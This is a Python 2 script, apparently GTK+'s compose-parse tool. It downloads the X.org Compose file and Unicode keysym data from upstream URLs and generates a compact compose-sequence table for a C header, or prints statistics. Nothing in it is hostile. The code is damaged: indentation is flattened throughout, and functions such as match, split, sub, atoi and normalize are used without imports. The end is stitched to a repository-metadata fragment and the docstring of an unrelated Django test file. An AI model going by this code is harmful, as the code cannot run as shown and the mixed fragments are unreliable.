from urllib import urlretrieve
from os.path import isfile, getsize
from copy import copy
import sys
import getopt
# We grab files off the web, left and right.
URL_COMPOSE = 'http://gitweb.freedesktop.org/?p=xorg/lib/libX11.git;a=blob_plain;f=nls/en_US.UTF-8/Compose.pre'
URL_KEYSYMSTXT = "http://www.cl.cam.ac.uk/~mgk25/ucs/keysyms.txt"
URL_GDKKEYSYMSH = "http://git.gnome.org/browse/gtk%2B/plain/gdk/gdkkeysyms.h"
URL_UNICODEDATATXT = 'http://www.unicode.org/Public/5.2.0/ucd/UnicodeData.txt'
FILENAME_COMPOSE_SUPPLEMENTARY = 'gtk-compose-lookaside.txt'
# We currently support keysyms of size 2; once upstream xorg gets sorted,
# we might produce some tables with size 2 and some with size 4.
SIZEOFINT = 2
# Current max compose sequence length; in case it gets increased.
WIDTHOFCOMPOSETABLE = 5
keysymdatabase = {}
keysymunicodedatabase = {}
unicodedatabase = {}
headerfile_start = """/* GTK - The GIMP Tool Kit
* Copyright (C) 2007, 2008 GNOME Foundation
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 02111-1307, USA.
*/
/*
* File auto-generated from script found at http://bugzilla.gnome.org/show_bug.cgi?id=321896
* using the input files
* Input : http://gitweb.freedesktop.org/?p=xorg/lib/libX11.git;a=blob_plain;f=nls/en_US.UTF-8/Compose.pre
* Input : http://www.cl.cam.ac.uk/~mgk25/ucs/keysyms.txt
* Input : http://www.unicode.org/Public/UNIDATA/UnicodeData.txt
*
* This table is optimised for space and requires special handling to access the content.
* This table is used solely by http://svn.gnome.org/viewcvs/gtk%2B/trunk/gtk/gtkimcontextsimple.c
*
* The resulting file is placed at http://svn.gnome.org/viewcvs/gtk%2B/trunk/gtk/gtkimcontextsimpleseqs.h
* This file is described in bug report http://bugzilla.gnome.org/show_bug.cgi?id=321896
*/
/*
* Modified by the GTK+ Team and others 2007, 2008. See the AUTHORS
* file for a list of people on the GTK+ Team. See the ChangeLog
* files for a list of changes. These files are distributed with
* GTK+ at ftp://ftp.gtk.org/pub/gtk/.
*/
#ifndef __GTK_IM_CONTEXT_SIMPLE_SEQS_H__
#define __GTK_IM_CONTEXT_SIMPLE_SEQS_H__
/* === These are the original comments of the file; we keep for historical purposes ===
*
* The following table was generated from the X compose tables include with
* XFree86 4.0 using a set of Perl scripts. Contact Owen Taylor <[email protected]>
* to obtain the relevant perl scripts.
*
* The following compose letter letter sequences confliced
* Dstroke/dstroke and ETH/eth; resolved to Dstroke (Croation, Vietnamese, Lappish), over
* ETH (Icelandic, Faroese, old English, IPA) [ D- -D d- -d ]
* Amacron/amacron and ordfeminine; resolved to ordfeminine [ _A A_ a_ _a ]
* Amacron/amacron and Atilde/atilde; resolved to atilde [ -A A- a- -a ]
* Omacron/Omacron and masculine; resolved to masculine [ _O O_ o_ _o ]
* Omacron/omacron and Otilde/atilde; resolved to otilde [ -O O- o- -o ]
*
* [ Amacron and Omacron are in Latin-4 (Baltic). ordfeminine and masculine are used for
* spanish. atilde and otilde are used at least for Portuguese ]
*
* at and Aring; resolved to Aring [ AA ]
* guillemotleft and caron; resolved to guillemotleft [ << ]
* ogonek and cedilla; resolved to cedilla [ ,, ]
*
* This probably should be resolved by first checking an additional set of compose tables
* that depend on the locale or selected input method.
*/
static const guint16 gtk_compose_seqs_compact[] = {"""
headerfile_end = """};
#endif /* __GTK_IM_CONTEXT_SIMPLE_SEQS_H__ */
"""
def stringtohex(str): return atoi(str, 16)
def factorial(n):
if n <= 1:
return 1
else:
return n * factorial(n-1)
def uniq(*args) :
""" Performs a uniq operation on a list or lists """
theInputList = []
for theList in args:
theInputList += theList
theFinalList = []
for elem in theInputList:
if elem not in theFinalList:
theFinalList.append(elem)
return theFinalList
def all_permutations(seq):
""" Borrowed from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/252178 """
""" Produces all permutations of the items of a list """
if len(seq) <=1:
yield seq
else:
for perm in all_permutations(seq[1:]):
for i in range(len(perm)+1):
#nb str[0:1] works in both string and list contexts
yield perm[:i] + seq[0:1] + perm[i:]
def usage():
print """compose-parse available parameters:
-h, --help this craft
-s, --statistics show overall statistics (both algorithmic, non-algorithmic)
-a, --algorithmic show sequences saved with algorithmic optimisation
-g, --gtk show entries that go to GTK+
-u, --unicodedatatxt show compose sequences derived from UnicodeData.txt (from unicode.org)
-v, --verbose show verbose output
-p, --plane1 show plane1 compose sequences
-n, --numeric when used with --gtk, create file with numeric values only
-e, --gtk-expanded when used with --gtk, create file that repeats first column; not usable in GTK+
--all-sequences when used with --gtk, create file with entries rejected by default
Default is to show statistics.
"""
try:
opts, args = getopt.getopt(sys.argv[1:], "pvgashune", ["help", "algorithmic", "statistics", "unicodedatatxt",
"stats", "gtk", "verbose", "plane1", "numeric", "gtk-expanded", "all-sequences"])
except:
usage()
sys.exit(2)
opt_statistics = False
opt_algorithmic = False
opt_gtk = False
opt_unicodedatatxt = False
opt_verbose = False
opt_plane1 = False
opt_numeric = False
opt_gtkexpanded = False
opt_allsequences = False
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
if o in ("-s", "--statistics"):
opt_statistics = True
if o in ("-a", "--algorithmic"):
opt_algorithmic = True
if o in ("-g", "--gtk"):
opt_gtk = True
if o in ("-u", "--unicodedatatxt"):
opt_unicodedatatxt = True
if o in ("-v", "--verbose"):
opt_verbose = True
if o in ("-p", "--plane1"):
opt_plane1 = True
if o in ("-n", "--numeric"):
opt_numeric = True
if o in ("-e", "--gtk-expanded"):
opt_gtkexpanded = True
if o == "--all-sequences":
opt_allsequences = True
if not opt_algorithmic and not opt_gtk and not opt_unicodedatatxt:
opt_statistics = True
def download_hook(blocks_transferred, block_size, file_size):
""" A download hook to provide some feedback when downloading """
if blocks_transferred == 0:
if file_size > 0:
if opt_verbose:
print "Downloading", file_size, "bytes: ",
else:
if opt_verbose:
print "Downloading: ",
sys.stdout.write('#')
sys.stdout.flush()
def download_file(url):
""" Downloads a file provided a URL. Returns the filename. """
""" Borks on failure """
localfilename = url.split('/')[-1]
if not isfile(localfilename) or getsize(localfilename) <= 0:
if opt_verbose:
print "Downloading ", url, "..."
try:
urlretrieve(url, localfilename, download_hook)
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
print " done."
else:
if opt_verbose:
print "Using cached file for ", url
return localfilename
def process_gdkkeysymsh():
""" Opens the gdkkeysyms.h file from GTK+/gdk/gdkkeysyms.h """
""" Fills up keysymdb with contents """
filename_gdkkeysymsh = download_file(URL_GDKKEYSYMSH)
try:
gdkkeysymsh = open(filename_gdkkeysymsh, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Parse the gdkkeysyms.h file and place contents in keysymdb """
linenum_gdkkeysymsh = 0
keysymdb = {}
for line in gdkkeysymsh.readlines():
linenum_gdkkeysymsh += 1
line = line.strip()
if line == "" or not match('^#define GDK_KEY_', line):
continue
components = split('\s+', line)
if len(components) < 3:
print "Invalid line %(linenum)d in %(filename)s: %(line)s"\
% {'linenum': linenum_gdkkeysymsh, 'filename': filename_gdkkeysymsh, 'line': line}
print "Was expecting 3 items in the line"
sys.exit(-1)
if not match('^GDK_KEY_', components[1]):
print "Invalid line %(linenum)d in %(filename)s: %(line)s"\
% {'linenum': linenum_gdkkeysymsh, 'filename': filename_gdkkeysymsh, 'line': line}
print "Was expecting a keysym starting with GDK_KEY_"
sys.exit(-1)
if match('^0x[0-9a-fA-F]+$', components[2]):
unival = long(components[2][2:], 16)
if unival == 0:
continue
keysymdb[components[1][8:]] = unival
else:
print "Invalid line %(linenum)d in %(filename)s: %(line)s"\
% {'linenum': linenum_gdkkeysymsh, 'filename': filename_gdkkeysymsh, 'line': line}
print "Was expecting a hexadecimal number at the end of the line"
sys.exit(-1)
gdkkeysymsh.close()
""" Patch up the keysymdb with some of our own stuff """
""" This is for a missing keysym from the currently upstream file """
#keysymdb['dead_stroke'] = 0x338
""" This is for a missing keysym from the currently upstream file """
###keysymdb['dead_belowring'] = 0x323
###keysymdb['dead_belowmacron'] = 0x331
###keysymdb['dead_belowcircumflex'] = 0x32d
###keysymdb['dead_belowtilde'] = 0x330
###keysymdb['dead_belowbreve'] = 0x32e
###keysymdb['dead_belowdiaeresis'] = 0x324
""" This is^Wwas preferential treatment for Greek """
# keysymdb['dead_tilde'] = 0x342
""" This is^was preferential treatment for Greek """
#keysymdb['combining_tilde'] = 0x342
""" Fixing VoidSymbol """
keysymdb['VoidSymbol'] = 0xFFFF
return keysymdb
def process_keysymstxt():
""" Grabs and opens the keysyms.txt file that Markus Kuhn maintains """
""" This file keeps a record between keysyms <-> unicode chars """
filename_keysymstxt = download_file(URL_KEYSYMSTXT)
try:
keysymstxt = open(filename_keysymstxt, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Parse the keysyms.txt file and place content in keysymdb """
linenum_keysymstxt = 0
keysymdb = {}
for line in keysymstxt.readlines():
linenum_keysymstxt += 1
line = line.strip()
if line == "" or match('^#', line):
continue
components = split('\s+', line)
if len(components) < 5:
print "Invalid line %(linenum)d in %(filename)s: %(line)s'"\
% {'linenum': linenum_keysymstxt, 'filename': filename_keysymstxt, 'line': line}
print "Was expecting 5 items in the line"
sys.exit(-1)
if match('^U[0-9a-fA-F]+$', components[1]):
unival = long(components[1][1:], 16)
if unival == 0:
continue
keysymdb[components[4]] = unival
keysymstxt.close()
""" Patch up the keysymdb with some of our own stuff """
""" This is for a missing keysym from the currently upstream file """
###keysymdb['dead_belowring'] = 0x323
###keysymdb['dead_belowmacron'] = 0x331
###keysymdb['dead_belowcircumflex'] = 0x32d
###keysymdb['dead_belowtilde'] = 0x330
###keysymdb['dead_belowbreve'] = 0x32e
###keysymdb['dead_belowdiaeresis'] = 0x324
""" This is preferential treatment for Greek """
""" => we get more savings if used for Greek """
# keysymdb['dead_tilde'] = 0x342
""" This is preferential treatment for Greek """
# keysymdb['combining_tilde'] = 0x342
""" This is for a missing keysym from Markus Kuhn's db """
keysymdb['dead_stroke'] = 0x338
""" This is for a missing keysym from Markus Kuhn's db """
keysymdb['Oslash'] = 0x0d8
""" This is for a missing keysym from Markus Kuhn's db """
keysymdb['Ssharp'] = 0x1e9e
""" This is for a missing (recently added) keysym """
keysymdb['dead_psili'] = 0x313
""" This is for a missing (recently added) keysym """
keysymdb['dead_dasia'] = 0x314
""" Allows to import Multi_key sequences """
keysymdb['Multi_key'] = 0xff20
keysymdb['zerosubscript'] = 0x2080
keysymdb['onesubscript'] = 0x2081
keysymdb['twosubscript'] = 0x2082
keysymdb['threesubscript'] = 0x2083
keysymdb['foursubscript'] = 0x2084
keysymdb['fivesubscript'] = 0x2085
keysymdb['sixsubscript'] = 0x2086
keysymdb['sevensubscript'] = 0x2087
keysymdb['eightsubscript'] = 0x2088
keysymdb['ninesubscript'] = 0x2089
keysymdb['dead_doublegrave'] = 0x030F
keysymdb['dead_invertedbreve'] = 0x0311
return keysymdb
def keysymvalue(keysym, file = "n/a", linenum = 0):
""" Extracts a value from the keysym """
""" Find the value of keysym, using the data from keysyms """
""" Use file and linenum to when reporting errors """
if keysym == "":
return 0
if keysymdatabase.has_key(keysym):
return keysymdatabase[keysym]
elif keysym[0] == 'U' and match('[0-9a-fA-F]+$', keysym[1:]):
return atoi(keysym[1:], 16)
elif keysym[:2] == '0x' and match('[0-9a-fA-F]+$', keysym[2:]):
return atoi(keysym[2:], 16)
else:
print 'keysymvalue: UNKNOWN{%(keysym)s}' % { "keysym": keysym }
#return -1
sys.exit(-1)
def keysymunicodevalue(keysym, file = "n/a", linenum = 0):
""" Extracts a value from the keysym """
""" Find the value of keysym, using the data from keysyms """
""" Use file and linenum to when reporting errors """
if keysym == "":
return 0
if keysymunicodedatabase.has_key(keysym):
return keysymunicodedatabase[keysym]
elif keysym[0] == 'U' and match('[0-9a-fA-F]+$', keysym[1:]):
return atoi(keysym[1:], 16)
elif keysym[:2] == '0x' and match('[0-9a-fA-F]+$', keysym[2:]):
return atoi(keysym[2:], 16)
else:
print 'keysymunicodevalue: UNKNOWN{%(keysym)s}' % { "keysym": keysym }
sys.exit(-1)
def rename_combining(seq):
filtered_sequence = []
for ks in seq:
if findall('^combining_', ks):
ks = sub('^combining_', 'dead_', ks)
if ks == 'dead_double_grave':
ks = 'dead_doublegrave'
if ks == 'dead_inverted_breve':
ks = 'dead_invertedbreve'
filtered_sequence.append(ks)
return filtered_sequence
keysymunicodedatabase = process_keysymstxt()
keysymdatabase = process_gdkkeysymsh()
""" Grab and open the compose file from upstream """
filename_compose = download_file(URL_COMPOSE)
try:
composefile = open(filename_compose, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Look if there is a lookaside (supplementary) compose file in the current
directory, and if so, open, then merge with upstream Compose file.
"""
xorg_compose_sequences_raw = []
for seq in composefile.readlines():
xorg_compose_sequences_raw.append(seq)
try:
composefile_lookaside = open(FILENAME_COMPOSE_SUPPLEMENTARY, 'r')
for seq in composefile_lookaside.readlines():
xorg_compose_sequences_raw.append(seq)
except IOError, (errno, strerror):
if opt_verbose:
print "I/O error(%s): %s" % (errno, strerror)
print "Did not find lookaside compose file. Continuing..."
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Parse the compose file in xorg_compose_sequences"""
xorg_compose_sequences = []
xorg_compose_sequences_algorithmic = []
linenum_compose = 0
comment_nest_depth = 0
for line in xorg_compose_sequences_raw:
linenum_compose += 1
line = line.strip()
if match("^XCOMM", line) or match("^#", line):
continue
line = sub(r"\/\*([^\*]*|[\*][^/])\*\/", "", line)
comment_start = line.find("/*")
if comment_start >= 0:
if comment_nest_depth == 0:
line = line[:comment_start]
else:
line = ""
comment_nest_depth += 1
else:
comment_end = line.find("*/")
if comment_end >= 0:
comment_nest_depth -= 1
if comment_nest_depth < 0:
print "Invalid comment %(linenum_compose)d in %(filename)s: \
Closing '*/' without opening '/*'" % { "linenum_compose": linenum_compose, "filename": filename_compose }
exit(-1)
if comment_nest_depth > 0:
line = ""
else:
line = line[comment_end + 2:]
if line is "":
continue
#line = line[:-1]
components = split(':', line)
if len(components) != 2:
print "Invalid line %(linenum_compose)d in %(filename)s: No sequence\
/value pair found" % { "linenum_compose": linenum_compose, "filename": filename_compose }
exit(-1)
(seq, val ) = split(':', line)
seq = seq.strip()
val = val.strip()
raw_sequence = findall('\w+', seq)
values = split('\s+', val)
unichar_temp = split('"', values[0])
unichar = unichar_temp[1]
if len(values) == 1:
continue
codepointstr = values[1]
if values[1] == '#':
# No codepoints that are >1 characters yet.
continue
if raw_sequence[0][0] == 'U' and match('[0-9a-fA-F]+$', raw_sequence[0][1:]):
raw_sequence[0] = '0x' + raw_sequence[0][1:]
if match('^U[0-9a-fA-F]+$', codepointstr):
codepoint = long(codepointstr[1:], 16)
elif keysymunicodedatabase.has_key(codepointstr):
#if keysymdatabase[codepointstr] != keysymunicodedatabase[codepointstr]:
#print "DIFFERENCE: 0x%(a)X 0x%(b)X" % { "a": keysymdatabase[codepointstr], "b": keysymunicodedatabase[codepointstr]},
#print raw_sequence, codepointstr
codepoint = keysymunicodedatabase[codepointstr]
else:
print
print "Invalid codepoint at line %(linenum_compose)d in %(filename)s:\
%(line)s" % { "linenum_compose": linenum_compose, "filename": filename_compose, "line": line }
exit(-1)
sequence = rename_combining(raw_sequence)
reject_this = False
for i in sequence:
if keysymvalue(i) > 0xFFFF:
reject_this = True
if opt_plane1:
print sequence
break
if keysymvalue(i) < 0:
reject_this = True
break
if reject_this:
continue
if "U0342" in sequence or \
"U0313" in sequence or \
"U0314" in sequence or \
"0x0313" in sequence or \
"0x0342" in sequence or \
"0x0314" in sequence:
continue
if "dead_belowring" in sequence or\
"dead_currency" in sequence or\
"dead_belowcomma" in sequence or\
"dead_belowmacron" in sequence or\
"dead_belowtilde" in sequence or\
"dead_belowbreve" in sequence or\
"dead_belowdiaeresis" in sequence or\
"dead_belowcircumflex" in sequence:
continue
#for i in range(len(sequence)):
# if sequence[i] == "0x0342":
# sequence[i] = "dead_tilde"
if "Multi_key" not in sequence:
""" Ignore for now >0xFFFF keysyms """
if codepoint < 0xFFFF:
original_sequence = copy(sequence)
stats_sequence = copy(sequence)
base = sequence.pop()
basechar = keysymvalue(base, filename_compose, linenum_compose)
if basechar < 0xFFFF:
counter = 1
unisequence = []
not_normalised = True
skipping_this = False
for i in range(0, len(sequence)):
""" If the sequence has dead_tilde and is for Greek, we don't do algorithmically
because of lack of dead_perispomeni (i.e. conflict)
"""
bc = basechar
"""if sequence[-1] == "dead_tilde" and (bc >= 0x370 and bc <= 0x3ff) or (bc >= 0x1f00 and bc <= 0x1fff):
skipping_this = True
break
if sequence[-1] == "dead_horn" and (bc >= 0x370 and bc <= 0x3ff) or (bc >= 0x1f00 and bc <= 0x1fff):
skipping_this = True
break
if sequence[-1] == "dead_ogonek" and (bc >= 0x370 and bc <= 0x3ff) or (bc >= 0x1f00 and bc <= 0x1fff):
skipping_this = True
break
if sequence[-1] == "dead_psili":
sequence[i] = "dead_horn"
if sequence[-1] == "dead_dasia":
sequence[-1] = "dead_ogonek"
"""
unisequence.append(unichr(keysymunicodevalue(sequence.pop(), filename_compose, linenum_compose)))
if skipping_this:
unisequence = []
for perm in all_permutations(unisequence):
# print counter, original_sequence, unichr(basechar) + "".join(perm)
# print counter, map(unichr, perm)
normalized = normalize('NFC', unichr(basechar) + "".join(perm))
if len(normalized) == 1:
# print 'Base: %(base)s [%(basechar)s], produces [%(unichar)s] (0x%(codepoint)04X)' \
# % { "base": base, "basechar": unichr(basechar), "unichar": unichar, "codepoint": codepoint },
# print "Normalized: [%(normalized)s] SUCCESS %(c)d" % { "normalized": normalized, "c": counter }
stats_sequence_data = map(keysymunicodevalue, stats_sequence)
stats_sequence_data.append(normalized)
xorg_compose_sequences_algorithmic.append(stats_sequence_data)
not_normalised = False
break;
counter += 1
if not_normalised or opt_allsequences:
original_sequence.append(codepoint)
xorg_compose_sequences.append(original_sequence)
""" print xorg_compose_sequences[-1] """
else:
print "Error in base char !?!"
exit(-2)
else:
print "OVER", sequence
exit(-1)
else:
sequence.append(codepoint)
xorg_compose_sequences.append(sequence)
""" print xorg_compose_sequences[-1] """
def sequence_cmp(x, y):
if keysymvalue(x[0]) > keysymvalue(y[0]):
return 1
elif keysymvalue(x[0]) < keysymvalue(y[0]):
return -1
elif len(x) > len(y):
return 1
elif len(x) < len(y):
return -1
elif keysymvalue(x[1]) > keysymvalue(y[1]):
return 1
elif keysymvalue(x[1]) < keysymvalue(y[1]):
return -1
elif len(x) < 4:
return 0
elif keysymvalue(x[2]) > keysymvalue(y[2]):
return 1
elif keysymvalue(x[2]) < keysymvalue(y[2]):
return -1
elif len(x) < 5:
return 0
elif keysymvalue(x[3]) > keysymvalue(y[3]):
return 1
elif keysymvalue(x[3]) < keysymvalue(y[3]):
return -1
elif len(x) < 6:
return 0
elif keysymvalue(x[4]) > keysymvalue(y[4]):
return 1
elif keysymvalue(x[4]) < keysymvalue(y[4]):
return -1
else:
return 0
def sequence_unicode_cmp(x, y):
if keysymunicodevalue(x[0]) > keysymunicodevalue(y[0]):
return 1
elif keysymunicodevalue(x[0]) < keysymunicodevalue(y[0]):
return -1
elif len(x) > len(y):
return 1
elif len(x) < len(y):
return -1
elif keysymunicodevalue(x[1]) > keysymunicodevalue(y[1]):
return 1
elif keysymunicodevalue(x[1]) < keysymunicodevalue(y[1]):
return -1
elif len(x) < 4:
return 0
elif keysymunicodevalue(x[2]) > keysymunicodevalue(y[2]):
return 1
elif keysymunicodevalue(x[2]) < keysymunicodevalue(y[2]):
return -1
elif len(x) < 5:
return 0
elif keysymunicodevalue(x[3]) > keysymunicodevalue(y[3]):
return 1
elif keysymunicodevalue(x[3]) < keysymunicodevalue(y[3]):
return -1
elif len(x) < 6:
return 0
elif keysymunicodevalue(x[4]) > keysymunicodevalue(y[4]):
return 1
elif keysymunicodevalue(x[4]) < keysymunicodevalue(y[4]):
return -1
else:
return 0
def sequence_algorithmic_cmp(x, y):
if len(x) < len(y):
return -1
elif len(x) > len(y):
return 1
else:
for i in range(len(x)):
if x[i] < y[i]:
return -1
elif x[i] > y[i]:
return 1
return 0
xorg_compose_sequences.sort(sequence_cmp)
xorg_compose_sequences_uniqued = []
first_time = True
item = None
for next_item in xorg_compose_sequences:
if first_time:
first_time = False
item = next_item
if sequence_unicode_cmp(item, next_item) != 0:
xorg_compose_sequences_uniqued.append(item)
item = next_item
xorg_compose_sequences = copy(xorg_compose_sequences_uniqued)
counter_multikey = 0
for item in xorg_compose_sequences:
if findall('Multi_key', "".join(item[:-1])) != []:
counter_multikey += 1
xorg_compose_sequences_algorithmic.sort(sequence_algorithmic_cmp)
xorg_compose_sequences_algorithmic_uniqued = uniq(xorg_compose_sequences_algorithmic)
firstitem = ""
num_first_keysyms = 0
zeroes = 0
num_entries = 0
num_algorithmic_greek = 0
for sequence in xorg_compose_sequences:
if keysymvalue(firstitem) != keysymvalue(sequence[0]):
firstitem = sequence[0]
num_first_keysyms += 1
zeroes += 6 - len(sequence) + 1
num_entries += 1
for sequence in xorg_compose_sequences_algorithmic_uniqued:
ch = ord(sequence[-1:][0])
if ch >= 0x370 and ch <= 0x3ff or ch >= 0x1f00 and ch <= 0x1fff:
num_algorithmic_greek += 1
if opt_algorithmic:
for sequence in xorg_compose_sequences_algorithmic_uniqued:
letter = "".join(sequence[-1:])
print '0x%(cp)04X, %(uni)s, seq: [ <0x%(base)04X>,' % { 'cp': ord(unicode(letter)), 'uni': letter.encode('utf-8'), 'base': sequence[-2] },
for elem in sequence[:-2]:
print "<0x%(keysym)04X>," % { 'keysym': elem },
""" Yeah, verified... We just want to keep the output similar to -u, so we can compare/sort easily """
print "], recomposed as", letter.encode('utf-8'), "verified"
def num_of_keysyms(seq):
return len(seq) - 1
def convert_UnotationToHex(arg):
if isinstance(arg, str):
if match('^U[0-9A-F][0-9A-F][0-9A-F][0-9A-F]$', arg):
return sub('^U', '0x', arg)
return arg
def addprefix_GDK(arg):
if match('^0x', arg):
return '%(arg)s, ' % { 'arg': arg }
else:
return 'GDK_KEY_%(arg)s, ' % { 'arg': arg }
if opt_gtk:
first_keysym = ""
sequence = []
compose_table = []
ct_second_part = []
ct_sequence_width = 2
start_offset = num_first_keysyms * (WIDTHOFCOMPOSETABLE+1)
we_finished = False
counter = 0
sequence_iterator = iter(xorg_compose_sequences)
sequence = sequence_iterator.next()
while True:
first_keysym = sequence[0] # Set the first keysym
compose_table.append([first_keysym, 0, 0, 0, 0, 0])
while sequence[0] == first_keysym:
compose_table[counter][num_of_keysyms(sequence)-1] += 1
try:
sequence = sequence_iterator.next()
except StopIteration:
we_finished = True
break
if we_finished:
break
counter += 1
ct_index = start_offset
for line_num in range(len(compose_table)):
for i in range(WIDTHOFCOMPOSETABLE):
occurences = compose_table[line_num][i+1]
compose_table[line_num][i+1] = ct_index
ct_index += occurences * (i+2)
for sequence in xorg_compose_sequences:
ct_second_part.append(map(convert_UnotationToHex, sequence))
print headerfile_start
for i in compose_table:
if opt_gtkexpanded:
print "0x%(ks)04X," % { "ks": keysymvalue(i[0]) },
print '%(str)s' % { 'str': "".join(map(lambda x : str(x) + ", ", i[1:])) }
elif not match('^0x', i[0]):
print 'GDK_KEY_%(str)s' % { 'str': "".join(map(lambda x : str(x) + ", ", i)) }
else:
print '%(str)s' % { 'str': "".join(map(lambda x : str(x) + ", ", i)) }
for i in ct_second_part:
if opt_numeric:
for ks in i[1:][:-1]:
print '0x%(seq)04X, ' % { 'seq': keysymvalue(ks) },
print '0x%(cp)04X, ' % { 'cp':i[-1] }
"""
for ks in i[:-1]:
print '0x%(seq)04X, ' % { 'seq': keysymvalue(ks) },
print '0x%(cp)04X, ' % { 'cp':i[-1] }
"""
elif opt_gtkexpanded:
print '%(seq)s0x%(cp)04X, ' % { 'seq': "".join(map(addprefix_GDK, i[:-1])), 'cp':i[-1] }
else:
print '%(seq)s0x%(cp)04X, ' % { 'seq': "".join(map(addprefix_GDK, i[:-1][1:])), 'cp':i[-1] }
print headerfile_end
def redecompose(codepoint):
(name, decomposition, combiningclass) = unicodedatabase[codepoint]
if decomposition[0] == '' or decomposition[0] == '0':
return [codepoint]
if match('<\w+>', decomposition[0]):
numdecomposition = map(stringtohex, decomposition[1:])
return map(redecompose, numdecomposition)
numdecomposition = map(stringtohex, decomposition)
return map(redecompose, numdecomposition)
def process_unicodedata_file(verbose = False):
""" Grab from wget http://www.unicode.org/Public/UNIDATA/UnicodeData.txt """
filename_unicodedatatxt = download_file(URL_UNICODEDATATXT)
try:
unicodedatatxt = open(filename_unicodedatatxt, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
for line in unicodedatatxt.readlines():
if line[0] == "" or line[0] == '#':
continue
line = line[:-1]
uniproperties = split(';', line)
codepoint = stringtohex(uniproperties[0])
""" We don't do Plane 1 or CJK blocks. The latter require reading additional files. """
if codepoint > 0xFFFF or (codepoint >= 0x4E00 and codepoint <= 0x9FFF) or (codepoint >= 0xF900 and codepoint <= 0xFAFF):
continue
name = uniproperties[1]
category = uniproperties[2]
combiningclass = uniproperties[3]
decomposition = uniproperties[5]
unicodedatabase[codepoint] = [name, split('\s+', decomposition), combiningclass]
counter_combinations = 0
counter_combinations_greek = 0
counter_entries = 0
counter_entries_greek = 0
for item in unicodedatabase.keys():
(name, decomposition, combiningclass) = unicodedatabase[item]
if decomposition[0] == '':
continue
print name, "is empty"
elif match('<\w+>', decomposition[0]):
continue
print name, "has weird", decomposition[0]
else:
sequence = map(stringtohex, decomposition)
chrsequence = map(unichr, sequence)
normalized = normalize('NFC', "".join(chrsequence))
""" print name, sequence, "Combining: ", "".join(chrsequence), normalized, len(normalized), """
decomposedsequence = []
for subseq in map(redecompose, sequence):
for seqitem in subseq:
if isinstance(seqitem, list):
for i in seqitem:
if isinstance(i, list):
for j in i:
decomposedsequence.append(j)
else:
decomposedsequence.append(i)
else:
decomposedsequence.append(seqitem)
recomposedchar = normalize('NFC', "".join(map(unichr, decomposedsequence)))
if len(recomposedchar) == 1 and len(decomposedsequence) > 1:
counter_entries += 1
counter_combinations += factorial(len(decomposedsequence)-1)
ch = item
if ch >= 0x370 and ch <= 0x3ff or ch >= 0x1f00 and ch <= 0x1fff:
counter_entries_greek += 1
counter_combinations_greek += factorial(len(decomposedsequence)-1)
if verbose:
print "0x%(cp)04X, %(uni)c, seq:" % { 'cp':item, 'uni':unichr(item) },
print "[",
for elem in decomposedsequence:
print '<0x%(hex)04X>,' % { 'hex': elem },
print "], recomposed as", recomposedchar,
if unichr(item) == recomposedchar:
print "verified"
if verbose == False:
print "Unicode statistics from UnicodeData.txt"
print "Number of entries that can be algorithmically produced :", counter_entries
print " of which are for Greek :", counter_entries_greek
print "Number of compose sequence combinations requiring :", counter_combinations
print " of which are for Greek :", counter_combinations_greek
print "Note: We do not include partial compositions, "
print "thus the slight discrepancy in the figures"
print
if opt_unicodedatatxt:
process_unicodedata_file(True)
if opt_statistics:
print
print "Total number of compose sequences (from file) :", len(xorg_compose_sequences) + len(xorg_compose_sequences_algorithmic)
print " of which can be expressed algorithmically :", len(xorg_compose_sequences_algorithmic)
print " of which cannot be expressed algorithmically :", len(xorg_compose_sequences)
print " of which have Multi_key :", counter_multikey
print
print "Algorithmic (stats for Xorg Compose file)"
print "Number of sequences off due to algo from file (len(array)) :", len(xorg_compose_sequences_algorithmic)
print "Number of sequences off due to algo (uniq(sort(array))) :", len(xorg_compose_sequences_algorithmic_uniqued)
print " of which are for Greek :", num_algorithmic_greek
print
process_unicodedata_file()
print "Not algorithmic (stats from Xorg Compose file)"
print "Number of sequences :", len(xorg_compose_sequences)
print "Flat array looks like :", len(xorg_compose_sequences), "rows of 6 integers (2 bytes per int, or 12 bytes per row)"
print "Flat array would have taken up (in bytes) :", num_entries * 2 * 6, "bytes from the GTK+ library"
print "Number of items in flat array :", len(xorg_compose_sequences) * 6
print " of which are zeroes :", zeroes, "or ", (100 * zeroes) / (len(xorg_compose_sequences) * 6), " per cent"
print "Number of different first items :", num_first_keysyms
print "Number of max bytes (if using flat array) :", num_entries * 2 * 6
print "Number of savings :", zeroes * 2 - num_first_keysyms * 2 * 5
print
print "Memory needs if both algorithmic+optimised table in latest Xorg compose file"
print " :", num_entries * 2 * 6 - zeroes * 2 + num_first_keysyms * 2 * 5
print
print "Existing (old) implementation in GTK+"
print "Number of sequences in old gtkimcontextsimple.c :", 691
print "The existing (old) implementation in GTK+ takes up :", 691 * 2 * 12, "bytes"
| bsd-3-clause |
kamyu104/django | tests/auth_tests/models/custom_permissions.py | 295 | 1433 | """
The CustomPermissionsUser users email as the identifier, but uses the normal
Django permissions model. This allows us to check that the PermissionsMixin
includes everything that is needed to interact with the ModelBackend.
"""
